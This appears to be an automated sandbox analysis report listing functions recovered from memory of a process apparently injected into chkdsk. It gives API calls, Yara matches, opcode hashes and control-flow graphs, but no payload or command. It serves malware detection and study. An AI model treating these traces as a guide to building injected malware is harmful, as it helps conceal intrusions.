                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 8dd1a51220632db7dd36851192de31b55a9dd41f8ee4612f6b661a04faa73de2
                                                      • Instruction ID: 6dac5fd243c1a88faced1c052e31c68681c9b9bb2e08c2ccaa0f3629f601f9d8
                                                      • Opcode Fuzzy Hash: 8dd1a51220632db7dd36851192de31b55a9dd41f8ee4612f6b661a04faa73de2
                                                      • Instruction Fuzzy Hash: AF01B2B2215208ABCB48DF89DD85EEB77ADAF8C754F158248FA0D97250D630E911CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtReadFile.NTDLL(04AA3D72,5E972F65,FFFFFFFF,04AA3A31,?,?,04AA3D72,?,04AA3A31,FFFFFFFF,5E972F65,04AA3D72,?,00000000), ref: 04AA86D5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: cac850fb891fba86128c10c4f0eb799131ff182452e7bbbc99c84e471cc1707b
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: 2BF0A4B2200208ABDB14DF89DC84EEB77ADAF8C754F158648BA1D97241D630E911CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,04A92D11,00002000,00003000,00000004), ref: 04AA87F9
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 3c732b3fc8ddfc0556ece49eb09e4487def9700ee5a84208ac500d9870802ce9
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: FEF015B2200208ABDB14DF89CC84EAB77ADAF88654F118548FE0897241C630F910CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(04AA3D50,?,?,04AA3D50,00000000,FFFFFFFF), ref: 04AA8735
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: b2234ce79c3243b3cad6fd89e96c5dc65602a95c4f4e49ff875086f254d876f4
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: E2D01776200214ABE710EB98CC89EA77BACEF48660F154499BA189B242C630FA10C6E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(04AA3D50,?,?,04AA3D50,00000000,FFFFFFFF), ref: 04AA8735
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 3edb4c14f6f14404a31a0132655fdc4f475eb7a39e58fefa9444ae8d119a2012
                                                      • Instruction ID: 0a5b3dd20309016139b9f9d5bf48ee6b28671a0bac1bcb4dd3c7bfa58d390407
                                                      • Opcode Fuzzy Hash: 3edb4c14f6f14404a31a0132655fdc4f475eb7a39e58fefa9444ae8d119a2012
                                                      • Instruction Fuzzy Hash: B0D02B9940D2C05FDB10FBB4A4C40D37F80EE5115871459CED4A857603D621E315D391
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 74f3cd559d9e348495a0492bc6c07b83613718cbd1a2c940e7b46f0303098133
                                                      • Instruction ID: b5dc39539c7a1e0a928a1fe9196ee754ff51b4652e32bb25225167d536ad6205
                                                      • Opcode Fuzzy Hash: 74f3cd559d9e348495a0492bc6c07b83613718cbd1a2c940e7b46f0303098133
                                                      • Instruction Fuzzy Hash: B09002A1242000076505719D4414616401B97E4245F51C021E10055A0DC565D8D17165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d85f2744397a440df4d424ce8090ac92f3b665675c4e81ac7a3e759696da7b05
                                                      • Instruction ID: ea0c235a2891a7ea445cbc9fd8b0de279a9ab13dcd443f51125ff1f1163174a6
                                                      • Opcode Fuzzy Hash: d85f2744397a440df4d424ce8090ac92f3b665675c4e81ac7a3e759696da7b05
                                                      • Instruction Fuzzy Hash: FB900265251000072505A59D0704507005797D9395751C021F1006560CD661D8A16161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3b969c0c0fcd23f99e417bc754e6969177acc3b61c0477ea5afcc0c5441a1a01
                                                      • Instruction ID: e1c12f24b3e8373cee62db851252fad2f6d8b02e266ba8339f6de317581af8a0
                                                      • Opcode Fuzzy Hash: 3b969c0c0fcd23f99e417bc754e6969177acc3b61c0477ea5afcc0c5441a1a01
                                                      • Instruction Fuzzy Hash: 1890027124100846F500619D4404B46001697E4345F51C016A0115664D8655D8917561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bd26814e8820f406288e5b0d96cff57e32617d77d47b6f2719c0d68d151f6d12
                                                      • Instruction ID: ce8a51e02419a2b43512bfc94cac4adb13997552c5af4f8d0f52cd5a12ee5755
                                                      • Opcode Fuzzy Hash: bd26814e8820f406288e5b0d96cff57e32617d77d47b6f2719c0d68d151f6d12
                                                      • Instruction Fuzzy Hash: A590027124108806F510619D840474A001697D4345F55C411A4415668D86D5D8D17161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 821622566480ca3d376dab22b126f0fc4207d8a058513c8b7f17b8f6c33807e1
                                                      • Instruction ID: 3b518ebcd7eaff1c80b9b5393d749716c40467b60eada92a230fe79f47e1cd21
                                                      • Opcode Fuzzy Hash: 821622566480ca3d376dab22b126f0fc4207d8a058513c8b7f17b8f6c33807e1
                                                      • Instruction Fuzzy Hash: C890027124504846F540719D4404A46002697D4349F51C011A00556A4D9665DD95B6A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 855cdbbe61aed3266defe5e3096ab5abb0966f38c410472433efc563adb2e1ba
                                                      • Instruction ID: c27206a886fe7452d8f17498a9870e81e687f2ca12f4f9b4acc3c8ac8f66840c
                                                      • Opcode Fuzzy Hash: 855cdbbe61aed3266defe5e3096ab5abb0966f38c410472433efc563adb2e1ba
                                                      • Instruction Fuzzy Hash: D790027124100806F580719D440464A001697D5345F91C015A0016664DCA55DA9977E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 27c2ff423447fca76aaa7f5340b963e6ff676b839880eb7b66bbd2d825e0302c
                                                      • Instruction ID: 06e8d1ee69851390b022f753424ceedeea5937c66021afb94db883384ba6c8e0
                                                      • Opcode Fuzzy Hash: 27c2ff423447fca76aaa7f5340b963e6ff676b839880eb7b66bbd2d825e0302c
                                                      • Instruction Fuzzy Hash: B190027135114406F510619D8404706001697D5245F51C411A0815568D86D5D8D17162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 73d697499a8cc8959e112ec4e4d4bf95bb08ddbdb16986db60606c956f203054
                                                      • Instruction ID: 79f8916288bdf9f7100a3a4a5e1b425d0f54ced0e09dcff444c6fe1add4e30c7
                                                      • Opcode Fuzzy Hash: 73d697499a8cc8959e112ec4e4d4bf95bb08ddbdb16986db60606c956f203054
                                                      • Instruction Fuzzy Hash: BB90026925300006F580719D540860A001697D5246F91D415A0006568CC955D8A96361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8401e58902cceaefbaac57aa08a55e7232495d5c08e1483f0a6381da90b98c95
                                                      • Instruction ID: 3d5a79c6da216192819566169a0731eea4bc4037af8410d8a0146b03cb1a4027
                                                      • Opcode Fuzzy Hash: 8401e58902cceaefbaac57aa08a55e7232495d5c08e1483f0a6381da90b98c95
                                                      • Instruction Fuzzy Hash: F890027124100406F50065DD5408646001697E4345F51D011A5015565EC6A5D8D17171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d19747d50ee363dd74c549ea44d0b2ac888f505ad47d22ceaeaad69f386da6b1
                                                      • Instruction ID: 1803757d0e66a41d04b2ab738def62341160e20d2f65409e36426ab95eaa6f6a
                                                      • Opcode Fuzzy Hash: d19747d50ee363dd74c549ea44d0b2ac888f505ad47d22ceaeaad69f386da6b1
                                                      • Instruction Fuzzy Hash: 7F900261282041567945B19D44045074017A7E4285B91C012A1405960C8566E896E661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1604c3b526b467299772ad800cf75b7537a049ea86aaaf0d8dc096ef1471e340
                                                      • Instruction ID: 49651fed67d1eab28aa967d22ed4f91f9afa02886ec9c8256002513aaaa9af57
                                                      • Opcode Fuzzy Hash: 1604c3b526b467299772ad800cf75b7537a049ea86aaaf0d8dc096ef1471e340
                                                      • Instruction Fuzzy Hash: BB90027124100417F511619D4504707001A97D4285F91C412A0415568D9696D992B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 598219b248dce314512aacdf33eee88fa00d70f53d4b4b33365560fc9c24ee13
                                                      • Instruction ID: acd7dbe5d81f1b632df47637984c60f63cf156f674cb709d45275bf1d0e7b79b
                                                      • Opcode Fuzzy Hash: 598219b248dce314512aacdf33eee88fa00d70f53d4b4b33365560fc9c24ee13
                                                      • Instruction Fuzzy Hash: 759002A138100446F500619D4414B060016D7E5345F51C015E1055564D8659DC927166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6926edbd1410c2f6bd09aaba668ded2dda828ebebb41312ff641c5b3849af42c
                                                      • Instruction ID: ae5b27acf9a8063b0bb74b7b570e4ded84b9dc69a0554aa4af99bd1d8ba8d320
                                                      • Opcode Fuzzy Hash: 6926edbd1410c2f6bd09aaba668ded2dda828ebebb41312ff641c5b3849af42c
                                                      • Instruction Fuzzy Hash: 289002B124100406F540719D4404746001697D4345F51C011A5055564E8699DDD576A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f0be23fa9f8deb070116005f2e380052cf2cac18f6e180b4a6beedf5506540f6
                                                      • Instruction ID: 90987e8036c4fb0fa9d031960ed373b1fc388ca342a6da28bc165ee297c6675e
                                                      • Opcode Fuzzy Hash: f0be23fa9f8deb070116005f2e380052cf2cac18f6e180b4a6beedf5506540f6
                                                      • Instruction Fuzzy Hash: 0690026125180046F60065AD4C14B07001697D4347F51C115A0145564CC955D8A16561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 221 4aa7300-4aa732f 222 4aa733b-4aa7342 221->222 223 4aa7336 call 4aaa020 221->223 224 4aa7348-4aa7398 call 4aaa0f0 call 4a99b40 call 4aa3e50 222->224 225 4aa741c-4aa7422 222->225 223->222 232 4aa73a0-4aa73b1 Sleep 224->232 233 4aa73b3-4aa73b9 232->233 234 4aa7416-4aa741a 232->234 235 4aa73bb-4aa73e1 call 4aa6f30 233->235 236 4aa73e3-4aa7403 233->236 234->225 234->232 237 4aa7409-4aa740c 235->237 236->237 238 4aa7404 call 4aa7130 236->238 237->234 238->237
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 04AA73A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: dfcd0beef329a6d91f179bf78e4fbef89336285b6136ea5f255df5743792d63b
                                                      • Instruction ID: b1b6f14a28f1ab1cd0d89e9fb1fde5426483886ba44b768bf0159eff15da7585
                                                      • Opcode Fuzzy Hash: dfcd0beef329a6d91f179bf78e4fbef89336285b6136ea5f255df5743792d63b
                                                      • Instruction Fuzzy Hash: 253170B6602700ABD715EF68C8A0FABB7F8AF88704F04852DFA595B241D730F555CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 241 4aa72f6-4aa7342 call 4aaa020 245 4aa7348-4aa7398 call 4aaa0f0 call 4a99b40 call 4aa3e50 241->245 246 4aa741c-4aa7422 241->246 253 4aa73a0-4aa73b1 Sleep 245->253 254 4aa73b3-4aa73b9 253->254 255 4aa7416-4aa741a 253->255 256 4aa73bb-4aa73e1 call 4aa6f30 254->256 257 4aa73e3-4aa7403 254->257 255->246 255->253 258 4aa7409-4aa740c 256->258 257->258 259 4aa7404 call 4aa7130 257->259 258->255 259->258
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 04AA73A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 304ebb4a01e5e1b3f792feb5afae3431580a8f8fc9bf642133a6ead3fdd11844
                                                      • Instruction ID: 00e98d121e0440db7cf097f40742e48ae57bb17c4ba84e65e3de6a2a5d6d786d
                                                      • Opcode Fuzzy Hash: 304ebb4a01e5e1b3f792feb5afae3431580a8f8fc9bf642133a6ead3fdd11844
                                                      • Instruction Fuzzy Hash: BC31BFB6601700ABD711DF64C8A0FABB7F8AF88704F04812DFA295B241E775F556CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 268 4aa88e8-4aa88ef 270 4aa88f1-4aa8907 call 4aa91e0 268->270 271 4aa8946-4aa895c call 4aa91e0 268->271 274 4aa890c-4aa8921 RtlFreeHeap 270->274
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04A93B93), ref: 04AA891D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 2fef7744b3f794cfed9e953800a30649d81d15b4c3c15a5fcb1b89bf5f5997d6
                                                      • Instruction ID: 4423ca8337818540b18a9de1a02f05ae8b46ff23c39aee8a27b6255e56fa28be
                                                      • Opcode Fuzzy Hash: 2fef7744b3f794cfed9e953800a30649d81d15b4c3c15a5fcb1b89bf5f5997d6
                                                      • Instruction Fuzzy Hash: C2F090B5204604ABDB14EFA8DC88DA777ACEF84260F008949F95D9B241C630EA24C7F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 277 4aa88f0-4aa8906 278 4aa890c-4aa8921 RtlFreeHeap 277->278 279 4aa8907 call 4aa91e0 277->279 279->278
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04A93B93), ref: 04AA891D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: ac70d71d71c08b955b4eac09cb49872cfed3f2f6e48be02e8a03c03b8888074e
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: DBE046B1200208ABDB18EF99CC48EA777ACEF88750F018558FE085B241C630F910CAF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04A972DA
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04A972FB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: dfb0c9938bf7794bd551d84ef68ee2598880c1ba43ae3997d4c9ec21dd612ec9
                                                      • Instruction ID: c2fa46bdc835e7ae902933d2023745f692734f77c646e96405550ec4aae36f50
                                                      • Opcode Fuzzy Hash: dfb0c9938bf7794bd551d84ef68ee2598880c1ba43ae3997d4c9ec21dd612ec9
                                                      • Instruction Fuzzy Hash: 84617FB5900209AFEB24DF64CD85FEBB7E8AB48704F10446DE94997280DB74BE41CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04A972DA
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04A972FB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                      • Instruction ID: 3beabd24e98c50442eb13c597391bdedc6241f1d740bad87609ab155272e9033
                                                      • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                      • Instruction Fuzzy Hash: 0501DF71A9022977FB20AA949D02FBE77AC5B00B54F040018FF04BE1C0EA947D0686F5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
